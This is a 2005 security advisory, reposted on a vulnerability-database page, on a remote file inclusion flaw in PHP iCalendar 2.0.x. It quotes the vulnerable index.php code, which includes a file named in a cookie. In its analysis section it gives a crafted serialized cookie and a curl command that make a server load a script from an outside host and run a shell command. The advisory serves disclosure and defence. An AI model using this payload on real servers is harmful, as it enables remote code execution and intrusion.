Lucene search
K

PHP iCalendar Cross Site Scripting

🗓️ 27 Oct 2005 00:00:00Reported by Francesco OngaroType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 24 Views

PHP iCalendar XSS Vulnerability in 2.0a2, 2.0b, 2.0c, 2.0.

Code
`PHP iCalendar CSS  
  
Name Cross-Site-Scripting Vulnerabilities in PHP iCalendar  
Systems Affected PHP iCalendar 2.0a2, 2.0b, 2.0c, 2.0.1  
Severity Medium Risk  
Vendor http://www.phpicalendar.net  
Advisory http://www.ush.it/2005/10/25/php-icalendar-css/  
Additional (it) http://www.ush.it/team/ascii/hack-PHP-iCalendar/adv.txt  
Author Francesco 'aScii' Ongaro (ascii at katamail . com)  
Date 20051023  
  
I. BACKGROUND  
  
PHP iCalendar is a php calendar, more information is available at the  
vendor site.  
  
II. DESCRIPTION  
  
PHP iCalendar is vulnerable to Cross Site Scripting cause of a wrong  
input validation in index.php and will include an arbitrary file  
ending with .php.  
  
The vulnerable code is:  
  
> config.inc.php  
  
$printview_default = 'no';  
  
> index.php  
  
if (isset($_COOKIE['phpicalendar'])) {  
$phpicalendar = unserialize(stripslashes($_COOKIE['phpicalendar']));  
$default_view = $phpicalendar['cookie_view'];  
}  
  
if ($printview_default == 'yes') {  
$printview = $default_view;  
$default_view = "print.php";  
} else {  
$default_view = "$default_view".".php";  
}  
  
include($default_view);  
  
As you can see there is no input validation at all.  
  
III. ANALYSIS  
  
This vulnerability can be exploited using an hand-crafted cookie with  
the right serialized array inside.  
  
a:1:{s:11:"cookie_view";s:23:"http://www.mali.cious/script";}  
  
curl http://www.vic.tim/path/ -b 'phpicalendar=a%3A1%3A%7Bs%3A11%3A%22cook  
ie_view%22%3Bs%3A34%3A%22http%3A%2F%2Fwww.  
ush.it%2Fteam%2Fascii%2F-----%22%3B%7D' -d 'user=uname -a'  
  
IV. DETECTION  
  
PHP iCalendar 2.0a2, 2.0b, 2.0c, 2.0.1 are vulnerable.  
  
V. WORKAROUND  
  
Input validation or header location will fix the vulnerability.  
PHP no remote fopen and open basedir will play also (if not..).  
  
VI. VENDOR RESPONSE  
  
Vendor fixed the bug in the cvs tree, not verified.  
  
http://www.ush.it/team/ascii/hack-PHP-iCalendar/mail1.txt  
http://www.ush.it/team/ascii/hack-PHP-iCalendar/mail2.txt  
  
VII. CVE INFORMATION  
  
No CVE at this time.  
  
VIII. DISCLOSURE TIMELINE  
  
20051023 Bug discovered  
20051024 Working exploit written  
20051025 Sikurezza.org notification  
20051025 Initial vendor notification  
20051025 Initial vendor response  
20051025 Vendor CVS fix  
20051025 Public disclosure  
  
IX. CREDIT  
  
ascii is credited with the discovery of this vulnerability.  
  
X. LEGAL NOTICES  
  
Copyright (c) 2005 Francesco 'aScii' Ongaro  
  
Permission is granted for the redistribution of this alert  
electronically. It may not be edited in any way without mine express  
written consent. If you wish to reprint the whole or any  
part of this alert in any other medium other than electronically, please  
email me for permission.  
  
Disclaimer: The information in the advisory is believed to be accurate  
at the time of publishing based on currently available information. Use  
of the information constitutes acceptance for use in an AS IS condition.  
There are no warranties with regard to this information. Neither the  
author nor the publisher accepts any liability for any direct, indirect,  
or consequential loss or damage arising from use of, or reliance on,  
this information.  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation